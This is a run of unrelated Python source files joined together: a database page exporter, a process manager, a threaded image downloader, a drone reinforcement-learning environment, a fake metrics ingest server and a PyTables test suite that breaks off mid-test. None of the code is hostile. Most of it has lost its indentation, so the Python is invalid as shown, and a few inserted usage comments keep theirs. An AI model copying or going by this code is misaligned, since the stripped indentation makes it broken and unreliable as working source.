self.saveFileData(d, page, s, e)
else:
if not self.isEmpty('checkSql', self.cfg):
self.log('Checking the page %d data...' % page)
sql2 = self.parseSQL(self.cfg['checkSql'], page, s, e)
self.log(sql2)
d2 = self.fetchData(sql2, page)
if d2 and d2["total"] > 0:
self.saveFileData(d2, page, s, e)
else:
self.log('The page %d is empty' % page)
else:
self.log('The page %d may be empty' % page)
else:
if d and d['total']>=0:
self.saveFileData(d, page, s, e)
else:
self.log('The page %d is empty' % page, ['error', None])
else:
if self.isLoopTask() :
if len(d) > 0:
self.savePostData(d, page, s, e)
else:
if not self.isEmpty('checkSql', self.cfg):
self.log('Checking the page %d data...' % page)
sql2 = self.parseSQL(self.cfg['checkSql'], page, s, e)
self.log(sql2)
d2 = self.fetchData(sql2, page)
if d2 and len(d2) > 0:
self.savePostData(d2, page, s, e)
else:
self.log('The page %d is empty' % page)
else:
self.log('The page %d may be empty' % page)
else:
if d != None:
self.savePostData(d, page, s, e)
else:
self.log('The page %d is empty' % page, ['error', None])
#gc
del d
gc.collect()
self.threadLock and self.threadLock.release()
def saveFileData(self, data, page, startLine, endLine):
if self.taskStatus < 0:
self.log('Thread export-%d has been interrupted' % page)
return
self.log('Start exporting the page %d, total %d items...' % (page, data['total']))
#save data
with open(self.dataPath.format(page=str(page)), "wb") as f:
f.write((self.cfg['exportPrefix'] + data['content'] + self.cfg['exportSubfix']).encode(self.cfg['exportCharset'], 'ignore'))
self.taskFinished += 1
self.log('The page %d info has been saved successfully' % page, ['update', self.getProgress('progress'), data['total'], 0])
#save info
with open(self.dataInfoPath.format(page=str(page)), "w", encoding="utf-8") as f:
f.write('{"total":%d,"error":0,"start":%d,"end":%d}' % (data['total'], startLine, endLine))
#save task
if self.isLoopTask():
self.saveTaskInfo(page, startLine, endLine, data['total'], 0)
return
def getCsvData(self, d):
s = self.cfg['exportPrefix']
for row in d:
t = self.cfg['exportBody'].replace('{field_columns}', ",".join(row.keys()))
t2 = ''
fl = len(row)
c = 0
for i, _ in row.items():
#filter
v = str(row[i]) if row[i] != None else row[i]
if self.cfg['exportFilterPattern']:
v = self.filterData(self.cfg['exportFilterPattern'], v, 'export')
#print(self.cfg['exportFilterPattern'] + '=>' + v)
if t.find('{comma_fields}') > -1:
t2 += self.cfg['exportNullValue'] if v == None else '"%s"' % v
if c < fl-1:
t2 += ','
else:
t = t.replace('{%s}' % str(i), str(v) if v != None else '')
c += 1
if t.find('{comma_fields}') > -1:
s += t.replace('{comma_fields}', t2)
else:
s += t
#gc
del t
s += self.cfg['exportSubfix']
return s
def savePostData(self, d, page, startLine, endLine):
if self.taskStatus < 0:
self.log('Thread export-%d has been interrupted' % page)
return
self.log('Start exporting the page %d, total %d items...' % (page, len(d)))
path = self.dataPath.format(page=str(page))
startLine = d[0][self.cfg['lineField']] if self.isLoopTask() and len(d) > 0 else startLine
endLine = d[0][self.cfg['lineField']] if self.isLoopTask() and len(d) > 0 else endLine-1
#sort and get min & max line
if self.isLoopTask() :
for row in d:
if row[self.cfg['lineField']] > endLine:
endLine = row[self.cfg['lineField']]
if row[self.cfg['lineField']] < startLine:
startLine = row[self.cfg['lineField']]
if self.getExportConfig('exportType') == 'excel':
try:
book = xlsxwriter.Workbook(path.replace('.csv', '.xlsx'))
except Exception as e:
self.log('Cannot create page %d as an excel file, Error: %s' % (page, e.__str__()))
return
sheet = book.add_worksheet('Worksheet')
startNo = 0
#header
if self.cfg['exportPrefix']:
startNo = 1
isBold = book.add_format({'bold': 1})
if self.cfg['exportPrefix'].find('{field_names}') > -1:
if d and len(d)>0:
c = 0
for k,_ in d[0].items():
sheet.write(0, c, k, isBold)
c += 1
else:
exportHeader = json.loads(self.cfg['exportPrefix'])
for i in range(0, len(exportHeader)):
sheet.write(0, i, exportHeader[i], isBold)
#cells
for k, row in enumerate(d):
c = 0
for _, v in row.items():
sheet.write(k + startNo, c, str(v) if v != None else '')
c += 1
#cancel
if self.taskStatus < 0:
self.log('Thread export-%d has been interrupted' % page)
return
try:
#save data
book.close()
self.taskFinished += 1
self.log('The page %d info has been saved successfully' % page, ['update', self.getProgress('progress'), len(d), 0])
#save info
with open(self.dataInfoPath.format(page=str(page)), "w", encoding="utf-8") as f:
f.write('{"total":%d,"error":0,"start":%d,"end":%d}' % (len(d), startLine, endLine))
#save task
if self.isLoopTask():
self.saveTaskInfo(page, startLine, endLine, len(d), 0)
except Exception as e:
self.log('Failed to save page %d as an excel file, Error: %s' % (page, e.__str__()), ['error', None])
#gc
del book
del sheet
else:
s = self.getCsvData(d)
if self.taskStatus < 0:
del s
self.log('Thread export-%d has been interrupted' % page)
return
try:
#save data
with open(path, "wb") as f:
f.write(s.encode(self.cfg['exportCharset'], 'ignore'))
self.taskFinished += 1
self.log('The page %d info has been saved successfully' % page, ['update', self.getProgress('progress'), len(d), 0])
#save info
with open(self.dataInfoPath.format(page=str(page)), "w", encoding="utf-8") as f:
f.write('{"total":%d,"error":0,"start":%d,"end":%d}' % (len(d), startLine, endLine))
#save task
if self.isLoopTask():
self.saveTaskInfo(page, startLine, endLine, len(d), 0)
except:
self.log('The page %d info failed to save' % page, ['error', None])
#gc
del s
return
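# Minimal usage sketch, not part of the original module; it assumes lib.Base
# can locate a configuration file whose 'Export' section provides the keys
# used above (driver, sql, pageSize, startLine, endLine, ...).
if __name__ == '__main__':
    exporter = Exporter()
    exporter.runTask()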
|
process.py
|
# -*- coding: utf-8 -*-
# Import python libs
import logging
import os
import time
import sys
import multiprocessing
import signal
# Import salt libs
import salt.utils
log = logging.getLogger(__name__)
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
try:
import systemd.daemon
HAS_PYTHON_SYSTEMD = True
except ImportError:
HAS_PYTHON_SYSTEMD = False
def set_pidfile(pidfile, user):
'''
Save the pidfile
'''
pdir = os.path.dirname(pidfile)
if not os.path.isdir(pdir) and pdir:
os.makedirs(pdir)
try:
with salt.utils.fopen(pidfile, 'w+') as ofile:
ofile.write(str(os.getpid()))
except IOError:
pass
log.debug(('Created pidfile: {0}').format(pidfile))
if salt.utils.is_windows():
return True
import pwd # after confirming not running Windows
#import grp
try:
pwnam = pwd.getpwnam(user)
uid = pwnam[2]
gid = pwnam[3]
#groups = [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
except (KeyError, IndexError):  # pwd.getpwnam raises KeyError for unknown users
sys.stderr.write(
'Failed to set the pid to user: {0}. The user is not '
'available.\n'.format(
user
)
)
sys.exit(os.EX_NOUSER)
if os.getuid() == uid:
# The current user already owns the pidfile. Return!
return
try:
os.chown(pidfile, uid, gid)
except OSError as err:
msg = (
'Failed to set the ownership of PID file {0} to user {1}.'.format(
pidfile, user
)
)
log.debug('{0} Traceback follows:\n'.format(msg), exc_info=True)
sys.stderr.write('{0}\n'.format(msg))
sys.exit(err.errno)
log.debug('Chowned pidfile: {0} to user: {1}'.format(pidfile, user))
def clean_proc(proc, wait_for_kill=10):
'''
Generic method for cleaning up multiprocessing procs
'''
# NoneType and other fun stuff need not apply
if not proc:
return
try:
waited = 0
while proc.is_alive():
proc.terminate()
waited += 1
time.sleep(0.1)
if proc.is_alive() and (waited >= wait_for_kill):
log.error(
'Process did not die with terminate(): {0}'.format(
proc.pid
)
)
os.kill(proc.pid, signal.SIGKILL)
except (AssertionError, AttributeError):
# Catch AssertionError when the proc is evaluated inside the child
# Catch AttributeError when the process dies between proc.is_alive()
# and proc.terminate() and turns into a NoneType
pass
def os_is_running(pid):
'''
Use OS facilities to determine if a process is running
'''
if HAS_PSUTIL:
return psutil.pid_exists(pid)
else:
try:
os.kill(pid, 0) # SIG 0 is the "are you alive?" signal
return True
except OSError:
return False
class ProcessManager(object):
'''
A class which will manage processes that should be running
'''
def __init__(self, name=None, wait_for_kill=1):
# pid -> {tgt: foo, Process: object, args: args, kwargs: kwargs}
self._process_map = {}
self.name = name
if self.name is None:
self.name = self.__class__.__name__
self.wait_for_kill = wait_for_kill
def add_process(self, tgt, args=None, kwargs=None):
'''
Create a process with args + kwargs
This will determine if it is a Process class, otherwise it assumes
it is a function
'''
if args is None:
args = []
if kwargs is None:
kwargs = {}
if type(multiprocessing.Process) == type(tgt) and issubclass(tgt, multiprocessing.Process):
p = tgt(*args, **kwargs)
else:
p = multiprocessing.Process(target=tgt, args=args, kwargs=kwargs)
p.start()
log.debug("Started '{0}'(*{1}, **{2} with pid {3}".format(tgt,
args,
kwargs,
p.pid))
self._process_map[p.pid] = {'tgt': tgt,
'args': args,
'kwargs': kwargs,
'Process': p}
def restart_process(self, pid):
'''
Create new process (assuming this one is dead), then remove the old one
'''
log.info(('Process {0} ({1}) died with exit status {2},'
' restarting...').format(self._process_map[pid]['tgt'],
pid,
self._process_map[pid]['Process'].exitcode))
# don't block, the process is already dead
self._process_map[pid]['Process'].join(1)
self.add_process(self._process_map[pid]['tgt'],
self._process_map[pid]['args'],
self._process_map[pid]['kwargs'])
del self._process_map[pid]
def run(self):
'''
Load and start all available api modules
'''
salt.utils.appendproctitle(self.name)
# make sure to kill the subprocesses if the parent is killed
signal.signal(signal.SIGTERM, self.kill_children)
try:
if HAS_PYTHON_SYSTEMD and systemd.daemon.booted():
systemd.daemon.notify('READY=1')
except SystemError:
# Daemon wasn't started by systemd
pass
while True:
try:
pid, exit_status = os.wait()
if pid not in self._process_map:
log.debug(('Process of pid {0} died, not a known'
' process, will not restart').format(pid))
continue
self.restart_process(pid)
# OSError is raised if a signal handler is called (SIGTERM) during os.wait
except OSError:
break
# in case someone died while we were waiting...
self.check_children()
def check_children(self):
'''
Check the children once
'''
for pid, mapping in self._process_map.iteritems():
if not mapping['Process'].is_alive():
self.restart_process(pid)
def kill_children(self, *args):
'''
Kill all of the children
'''
for pid, p_map in self._process_map.items():
p_map['Process'].terminate()
#
end_time = time.time() + self.wait_for_kill # when to die
while self._process_map and time.time() < end_time:
for pid, p_map in self._process_map.items():
p_map['Process'].join(0)
# This is a race condition if a signal was passed to all children
try:
del self._process_map[pid]
except KeyError:
pass
# if anyone is done after
for pid in self._process_map:
try:
os.kill(pid, signal.SIGKILL)
# in case the process has since decided to die, os.kill raises OSError
except OSError:
pass
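# Minimal usage sketch, not part of the original module (some_callable is a
# placeholder for any function or multiprocessing.Process subclass):
#   pm = ProcessManager(name='example-manager')
#   pm.add_process(some_callable, args=[1, 2])
#   pm.run()  # blocks, restarting children whenever they exit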
|
threadlamba.py
|
from threading import Thread
import urllib.request
import random
t = Thread()
t.run = lambda : print("HELLO VOID")
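# Note: t is constructed but never started; calling t.start() would invoke the
# lambda assigned to t.run and print "HELLO VOID".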
#print("BOSS IS BOSS")
url = "https://download.gtanet.com/gtagarage/files/image_70116.jpg"
for i in range(10):
fname = str(i) + url.split("/")[-1]
Thread(target=lambda : urllib.request.urlretrieve(url,fname)).start()
|
distance.py
|
#!/usr/bin/env python3
'''
3D distance-maximizing environment
Copyright (C) 2020 Simon D. Levy
MIT License
'''
import numpy as np
import gym
from gym import spaces
from gym.utils import seeding, EzPickle
from gym_copter.dynamics.djiphantom import DJIPhantomDynamics
class Distance(gym.Env, EzPickle):
FRAMES_PER_SECOND = 50
metadata = {
'render.modes': ['human', 'rgb_array'],
'video.frames_per_second' : FRAMES_PER_SECOND
}
def __init__(self):
EzPickle.__init__(self)
self.seed()
# Observation is all state values except yaw and its derivative
self.observation_space = spaces.Box(-np.inf, np.inf, shape=(10,), dtype=np.float32)
# Action is motor values
self.action_space = spaces.Box(-1, +1, (4,), dtype=np.float32)
# Support for rendering
self.renderer = None
self.pose = None
self.reset()
def seed(self, seed=None):
self.np_random, seed = seeding.np_random(seed)
return [seed]
def reset(self):
self.prev_shaping = None
# Create custom dynamics model
self.dynamics = DJIPhantomDynamics(self.FRAMES_PER_SECOND)
# Initialize custom dynamics
state = np.zeros(12)
self.dynamics.setState(state)
return self.step(np.array([0, 0, 0, 0]))[0]
def step(self, action):
# Abbreviation
d = self.dynamics
d.setMotors(action)
d.update()
# Get new state from dynamics
posx, velx, posy, vely, posz, velz, phi, velphi, theta, veltheta, psi, _ = d.getState()
# Set pose in display
self.pose = posx, posy, posz, phi, theta, psi
# Convert state to usable form
state = np.array([posx, velx, posy, vely, posz, velz, phi, velphi, theta, veltheta])
# Reward is the change in horizontal distance from the origin (larger is better)
shaping = np.sqrt(posx**2 + posy**2)
reward = (shaping - self.prev_shaping) if (self.prev_shaping is not None) else 0
self.prev_shaping = shaping
done = False
return np.array(state, dtype=np.float32), reward, done, {}
def render(self, mode='human'):
from gym_copter.rendering.threed import ThreeDDistanceRenderer
# Create renderer if not done yet
if self.renderer is None:
self.renderer = ThreeDDistanceRenderer(self)
return self.renderer.render()
def close(self):
return
## End of Distance class ----------------------------------------------------------------
def heuristic(env, s):
"""
The heuristic for
1. Testing
2. Demonstration rollout.
Args:
env: The environment
s (list): The state. Attributes:
s[0] is the X coordinate
s[1] is the X speed
s[2] is the Y coordinate
s[3] is the Y speed
s[4] is the vertical coordinate
s[5] is the vertical speed
s[6] is the roll angle
s[7] is the roll angular speed
s[8] is the pitch angle
s[9] is the pitch angular speed
returns:
a: The heuristic to be fed into the step function defined above to determine the next step and reward.
"""
_, _, _, _, posz, _, _, _, theta, _ = s
action = np.zeros(4)
if posz > -3:
action = 0.6 * np.ones(4) # below 3m, takeoff
elif theta < np.pi/8:
action = np.array([.505, .5, .505, .5]) # shallow pitch; pitch forward
else:
action = 0.55*np.ones(4)
return action
def heuristic_distance(env, renderer=None, seed=None):
import time
if seed is not None:
env.seed(seed)
np.random.seed(seed)
total_reward = 0
steps = 0
state = env.reset()
while True:
action = heuristic(env,state)
state, reward, done, _ = env.step(action)
total_reward += reward
if steps % 20 == 0 or done:
print("observations:", " ".join(["{:+0.2f}".format(x) for x in state]))
print("step {} total_reward {:+0.2f}".format(steps, total_reward))
steps += 1
if done: break
if renderer is not None:
time.sleep(1./env.FRAMES_PER_SECOND)
env.close()
return total_reward
if __name__ == '__main__':
from gym_copter.rendering.threed import ThreeDDistanceRenderer
import threading
env = Distance()
renderer = ThreeDDistanceRenderer(env)
thread = threading.Thread(target=heuristic_distance, args=(env, renderer))
thread.daemon = True
thread.start()
# Begin 3D rendering on main thread
renderer.start()
|
sink.py
|
import json
import signal
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from time import time
# This module collects metrics from collectd and can echo them back out for
# making assertions on the collected metrics.
# Fake the /v1/collectd endpoint and just stick all of the metrics in a
# list
def run_fake_ingest(metric_data):
class FakeCollectdIngest(BaseHTTPRequestHandler):
def do_POST(self):
body = self.rfile.read(int(self.headers.get("Content-Length")))
metric_data.extend(json.loads(body))
self.send_response(200)
self.send_header("Content-Type", "text/ascii")
self.send_header("Content-Length", "2")
self.end_headers()
self.wfile.write("OK".encode("utf-8"))
print("Starting ingest server on port 80")
httpd = HTTPServer(("", 80), FakeCollectdIngest)
httpd.serve_forever()
print("Ingest server shutting down")
# Dumps all of the collected metrics back out as JSON upon request
def serve_metric_data(metric_data):
class MetricDataSpewer(BaseHTTPRequestHandler):
def do_GET(self):
data = json.dumps(metric_data)
self.send_response(200)
self.send_header("Content-Type", "application/json")
self.send_header("Content-Length", str(len(data)))
self.end_headers()
print(data)
self.wfile.write(data.encode("utf-8"))
print("Starting metric spewer on port 8080")
httpd = HTTPServer(("", 8080), MetricDataSpewer)
httpd.serve_forever()
print("Metric spewer shutting down")
if __name__ == "__main__":
# List append operations are thread-safe under CPython's GIL
metric_data = []
t1 = threading.Thread(target=run_fake_ingest, args=(metric_data,))
t2 = threading.Thread(target=serve_metric_data, args=(metric_data,))
t1.start()
t2.start()
t1.join()
t2.join()
|
test_basics.py
|
# -*- coding: utf-8 -*-
import os
import sys
import shutil
import platform
import tempfile
import warnings
import threading
import subprocess
import queue
try:
import multiprocessing as mp
multiprocessing_imported = True
except ImportError:
multiprocessing_imported = False
import numpy
import tables
import tables.flavor
from tables import (
Description, IsDescription, Float64Atom, Col, IntCol, Int16Col, Int32Col,
FloatCol, Float64Col,
ClosedFileError, FileModeError, FlavorError, FlavorWarning,
NaturalNameWarning, ClosedNodeError, NodeError, NoSuchNodeError,
UnImplemented,
)
from tables.flavor import all_flavors, array_of_flavor
from tables.parameters import NODE_CACHE_SLOTS
from tables.description import descr_from_dtype, dtype_from_descr
from tables.tests import common
from tables.tests.common import unittest, test_filename
from tables.tests.common import PyTablesTestCase as TestCase
class OpenFileFailureTestCase(TestCase):
def setUp(self):
super(OpenFileFailureTestCase, self).setUp()
import tables.file
self.N = len(tables.file._open_files)
self.open_files = tables.file._open_files
def test01_open_file(self):
"""Checking opening of a non existing file."""
h5fname = tempfile.mktemp(".h5")
with self.assertRaises(IOError):
h5file = tables.open_file(h5fname)
h5file.close()
self.assertEqual(self.N, len(self.open_files))
def test02_open_file(self):
"""Checking opening of an existing non HDF5 file."""
# create a dummy file
h5fname = tempfile.mktemp(".h5")
open(h5fname, 'wb').close()
# Try to open the dummy file
try:
with self.assertRaises(tables.HDF5ExtError):
h5file = tables.open_file(h5fname)
h5file.close()
self.assertEqual(self.N, len(self.open_files))
finally:
os.remove(h5fname)
def test03_open_file(self):
"""Checking opening of an existing file with invalid mode."""
# See gh-318
# create a dummy file
h5fname = tempfile.mktemp(".h5")
h5file = tables.open_file(h5fname, "w")
h5file.close()
try:
# Try to open the dummy file
self.assertRaises(ValueError, tables.open_file, h5fname, "ab")
finally:
os.remove(h5fname)
class OpenFileTestCase(common.TempFileMixin, TestCase):
def setUp(self):
super(OpenFileTestCase, self).setUp()
self.populateFile()
def populateFile(self):
root = self.h5file.root
# Create an array
self.h5file.create_array(root, 'array', [1, 2], title="Array example")
self.h5file.create_table(root, 'table', {'var1': IntCol()},
"Table example")
root._v_attrs.testattr = 41
# Create another array object
self.h5file.create_array(root, 'anarray', [1], "Array title")
self.h5file.create_table(root, 'atable', {'var1': IntCol()},
"Table title")
# Create a group object
group = self.h5file.create_group(root, 'agroup', "Group title")
group._v_attrs.testattr = 42
        # Create some objects there
array1 = self.h5file.create_array(group, 'anarray1',
[1, 2, 3, 4, 5, 6, 7],
"Array title 1")
array1.attrs.testattr = 42
self.h5file.create_array(group, 'anarray2', [2], "Array title 2")
self.h5file.create_table(group, 'atable1', {
'var1': IntCol()}, "Table title 1")
ra = numpy.rec.array([(1, 11, 'a')], formats='u1,f4,a1')
self.h5file.create_table(group, 'atable2', ra, "Table title 2")
# Create a lonely group in first level
self.h5file.create_group(root, 'agroup2', "Group title 2")
# Create a new group in the second level
group3 = self.h5file.create_group(group, 'agroup3', "Group title 3")
# Create a new group in the third level
self.h5file.create_group(group3, 'agroup4', "Group title 4")
# Create an array in the root with the same name as one in 'agroup'
self.h5file.create_array(root, 'anarray1', [1, 2],
title="Array example")
def test00_newFile(self):
"""Checking creation of a new file."""
self.h5file.create_array(self.h5file.root, 'array_new', [1, 2],
title="Array example")
# Get the CLASS attribute of the arr object
class_ = self.h5file.root.array.attrs.CLASS
self.assertEqual(class_.capitalize(), "Array")
def test00_newFile_unicode_filename(self):
temp_dir = tempfile.mkdtemp()
try:
h5fname = str(os.path.join(temp_dir, 'test.h5'))
with tables.open_file(h5fname, 'w') as h5file:
                self.assertIsInstance(h5file, tables.File)
finally:
shutil.rmtree(temp_dir)
def test00_newFile_numpy_str_filename(self):
temp_dir = tempfile.mkdtemp()
try:
h5fname = numpy.str_(os.path.join(temp_dir, 'test.h5'))
with tables.open_file(h5fname, 'w') as h5file:
                self.assertIsInstance(h5file, tables.File)
finally:
shutil.rmtree(temp_dir)
def test00_newFile_numpy_unicode_filename(self):
temp_dir = tempfile.mkdtemp()
try:
h5fname = numpy.unicode_(os.path.join(temp_dir, 'test.h5'))
with tables.open_file(h5fname, 'w') as h5file:
                self.assertIsInstance(h5file, tables.File)
finally:
shutil.rmtree(temp_dir)
def test01_openFile(self):
"""Checking opening of an existing file."""
# Open the old HDF5 file
self._reopen(node_cache_slots=self.node_cache_slots)
        # Get the TITLE attribute of the array object
title = self.h5file.root.array.get_attr("TITLE")
self.assertEqual(title, "Array example")
def test02_appendFile(self):
"""Checking appending objects to an existing file."""
# Append a new array to the existing file
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
self.h5file.create_array(self.h5file.root, 'array2', [3, 4],
title="Title example 2")
# Open this file in read-only mode
self._reopen(node_cache_slots=self.node_cache_slots)
        # Get the TITLE attribute of the array2 object
title = self.h5file.root.array2.get_attr("TITLE")
self.assertEqual(title, "Title example 2")
def test02b_appendFile2(self):
"""Checking appending objects to an existing file ("a" version)"""
# Append a new array to the existing file
self._reopen(mode="a", node_cache_slots=self.node_cache_slots)
self.h5file.create_array(self.h5file.root, 'array2', [3, 4],
title="Title example 2")
# Open this file in read-only mode
self._reopen(node_cache_slots=self.node_cache_slots)
        # Get the TITLE attribute of the array2 object
title = self.h5file.root.array2.get_attr("TITLE")
self.assertEqual(title, "Title example 2")
# Begin to raise errors...
def test03_appendErrorFile(self):
"""Checking appending objects to an existing file in "w" mode."""
# Append a new array to the existing file but in write mode
# so, the existing file should be deleted!
self._reopen(mode="w", node_cache_slots=self.node_cache_slots)
self.h5file.create_array(self.h5file.root, 'array2', [3, 4],
title="Title example 2")
# Open this file in read-only mode
self._reopen(node_cache_slots=self.node_cache_slots)
with self.assertRaises(LookupError):
# Try to get the 'array' object in the old existing file
self.h5file.root.array
def test04a_openErrorFile(self):
"""Checking opening a non-existing file for reading"""
with self.assertRaises(IOError):
tables.open_file("nonexistent.h5", mode="r",
node_cache_slots=self.node_cache_slots)
def test04b_alternateRootFile(self):
"""Checking alternate root access to the object tree."""
        # Open the existing HDF5 file
self._reopen(root_uep="/agroup",
node_cache_slots=self.node_cache_slots)
        # Get the TITLE attribute of the anarray1 object
if common.verbose:
print("\nFile tree dump:", self.h5file)
title = self.h5file.root.anarray1.get_attr("TITLE")
# Get the node again, as this can trigger errors in some situations
anarray1 = self.h5file.root.anarray1
self.assertIsNotNone(anarray1)
self.assertEqual(title, "Array title 1")
    # This test works well, but HDF5 emits a series of messages that
    # may confuse the user. It is better to keep it deactivated.
def notest04c_alternateRootFile(self):
"""Checking non-existent alternate root access to the object tree"""
with self.assertRaises(RuntimeError):
self._reopen(root_uep="/nonexistent",
node_cache_slots=self.node_cache_slots)
def test05a_removeGroupRecursively(self):
"""Checking removing a group recursively."""
        # Delete a group with leaves
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
with self.assertRaises(NodeError):
self.h5file.remove_node(self.h5file.root.agroup)
# This should work now
self.h5file.remove_node(self.h5file.root, 'agroup', recursive=1)
# Open this file in read-only mode
self._reopen(node_cache_slots=self.node_cache_slots)
# Try to get the removed object
with self.assertRaises(LookupError):
self.h5file.root.agroup
# Try to get a child of the removed object
with self.assertRaises(LookupError):
self.h5file.get_node("/agroup/agroup3")
def test05b_removeGroupRecursively(self):
"""Checking removing a group recursively and access to it
immediately."""
if common.verbose:
print('\n', '-=' * 30)
print("Running %s.test05b_removeGroupRecursively..." %
self.__class__.__name__)
        # Delete a group with leaves
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
with self.assertRaises(NodeError):
self.h5file.remove_node(self.h5file.root, 'agroup')
# This should work now
self.h5file.remove_node(self.h5file.root, 'agroup', recursive=1)
# Try to get the removed object
with self.assertRaises(LookupError):
self.h5file.root.agroup
# Try to get a child of the removed object
with self.assertRaises(LookupError):
self.h5file.get_node("/agroup/agroup3")
def test06_removeNodeWithDel(self):
"""Checking removing a node using ``__delattr__()``"""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
with self.assertRaises(AttributeError):
# This should fail because there is no *Python attribute*
# called ``agroup``.
del self.h5file.root.agroup
def test06a_removeGroup(self):
"""Checking removing a lonely group from an existing file."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
self.h5file.remove_node(self.h5file.root, 'agroup2')
# Open this file in read-only mode
self._reopen(node_cache_slots=self.node_cache_slots)
# Try to get the removed object
with self.assertRaises(LookupError):
self.h5file.root.agroup2
def test06b_removeLeaf(self):
"""Checking removing Leaves from an existing file."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
self.h5file.remove_node(self.h5file.root, 'anarray')
# Open this file in read-only mode
self._reopen(node_cache_slots=self.node_cache_slots)
# Try to get the removed object
with self.assertRaises(LookupError):
self.h5file.root.anarray
def test06c_removeLeaf(self):
"""Checking removing Leaves and access it immediately."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
self.h5file.remove_node(self.h5file.root, 'anarray')
# Try to get the removed object
with self.assertRaises(LookupError):
self.h5file.root.anarray
def test06d_removeLeaf(self):
"""Checking removing a non-existent node"""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
# Try to get the removed object
with self.assertRaises(LookupError):
self.h5file.remove_node(self.h5file.root, 'nonexistent')
def test06e_removeTable(self):
"""Checking removing Tables from an existing file."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
self.h5file.remove_node(self.h5file.root, 'atable')
# Open this file in read-only mode
self._reopen(node_cache_slots=self.node_cache_slots)
# Try to get the removed object
with self.assertRaises(LookupError):
self.h5file.root.atable
def test07_renameLeaf(self):
"""Checking renaming a leave and access it after a close/open."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
self.h5file.rename_node(self.h5file.root.anarray, 'anarray2')
# Open this file in read-only mode
self._reopen(node_cache_slots=self.node_cache_slots)
# Ensure that the new name exists
array_ = self.h5file.root.anarray2
self.assertEqual(array_.name, "anarray2")
self.assertEqual(array_._v_pathname, "/anarray2")
self.assertEqual(array_._v_depth, 1)
# Try to get the previous object with the old name
with self.assertRaises(LookupError):
self.h5file.root.anarray
def test07b_renameLeaf(self):
"""Checking renaming Leaves and accesing them immediately."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
self.h5file.rename_node(self.h5file.root.anarray, 'anarray2')
# Ensure that the new name exists
array_ = self.h5file.root.anarray2
self.assertEqual(array_.name, "anarray2")
self.assertEqual(array_._v_pathname, "/anarray2")
self.assertEqual(array_._v_depth, 1)
# Try to get the previous object with the old name
with self.assertRaises(LookupError):
self.h5file.root.anarray
def test07c_renameLeaf(self):
"""Checking renaming Leaves and modify attributes after that."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
self.h5file.rename_node(self.h5file.root.anarray, 'anarray2')
array_ = self.h5file.root.anarray2
array_.attrs.TITLE = "hello"
# Ensure that the new attribute has been written correctly
self.assertEqual(array_.title, "hello")
self.assertEqual(array_.attrs.TITLE, "hello")
def test07d_renameLeaf(self):
"""Checking renaming a Group under a nested group."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
self.h5file.rename_node(self.h5file.root.agroup.anarray2, 'anarray3')
        # Ensure that we can access attributes of the renamed node
node = self.h5file.root.agroup.anarray3
self.assertEqual(node._v_title, "Array title 2")
def test08_renameToExistingLeaf(self):
"""Checking renaming a node to an existing name."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
# Try to get the previous object with the old name
with self.assertRaises(NodeError):
self.h5file.rename_node(self.h5file.root.anarray, 'array')
# Now overwrite the destination node.
anarray = self.h5file.root.anarray
self.h5file.rename_node(anarray, 'array', overwrite=True)
self.assertNotIn('/anarray', self.h5file)
self.assertIs(self.h5file.root.array, anarray)
def test08b_renameToNotValidNaturalName(self):
"""Checking renaming a node to a non-valid natural name"""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
with warnings.catch_warnings():
warnings.filterwarnings("error", category=NaturalNameWarning)
# Try to get the previous object with the old name
with self.assertRaises(NaturalNameWarning):
self.h5file.rename_node(self.h5file.root.anarray, 'array 2')
def test09_renameGroup(self):
"""Checking renaming a Group and access it after a close/open."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
self.h5file.rename_node(self.h5file.root.agroup, 'agroup3')
# Open this file in read-only mode
self._reopen(node_cache_slots=self.node_cache_slots)
# Ensure that the new name exists
group = self.h5file.root.agroup3
self.assertEqual(group._v_name, "agroup3")
self.assertEqual(group._v_pathname, "/agroup3")
# The children of this group also must be accessible through the
# new name path
group2 = self.h5file.get_node("/agroup3/agroup3")
self.assertEqual(group2._v_name, "agroup3")
self.assertEqual(group2._v_pathname, "/agroup3/agroup3")
# Try to get the previous object with the old name
with self.assertRaises(LookupError):
self.h5file.root.agroup
# Try to get a child with the old pathname
with self.assertRaises(LookupError):
self.h5file.get_node("/agroup/agroup3")
def test09b_renameGroup(self):
"""Checking renaming a Group and access it immediately."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
self.h5file.rename_node(self.h5file.root.agroup, 'agroup3')
# Ensure that the new name exists
group = self.h5file.root.agroup3
self.assertEqual(group._v_name, "agroup3")
self.assertEqual(group._v_pathname, "/agroup3")
# The children of this group also must be accessible through the
# new name path
group2 = self.h5file.get_node("/agroup3/agroup3")
self.assertEqual(group2._v_name, "agroup3")
self.assertEqual(group2._v_pathname, "/agroup3/agroup3")
# Try to get the previous object with the old name
with self.assertRaises(LookupError):
self.h5file.root.agroup
# Try to get a child with the old pathname
with self.assertRaises(LookupError):
self.h5file.get_node("/agroup/agroup3")
def test09c_renameGroup(self):
"""Checking renaming a Group and modify attributes afterwards."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
self.h5file.rename_node(self.h5file.root.agroup, 'agroup3')
# Ensure that we can modify attributes in the new group
group = self.h5file.root.agroup3
group._v_attrs.TITLE = "Hello"
self.assertEqual(group._v_title, "Hello")
self.assertEqual(group._v_attrs.TITLE, "Hello")
def test09d_renameGroup(self):
"""Checking renaming a Group under a nested group."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
self.h5file.rename_node(self.h5file.root.agroup.agroup3, 'agroup4')
        # Ensure that we can access attributes in the renamed group
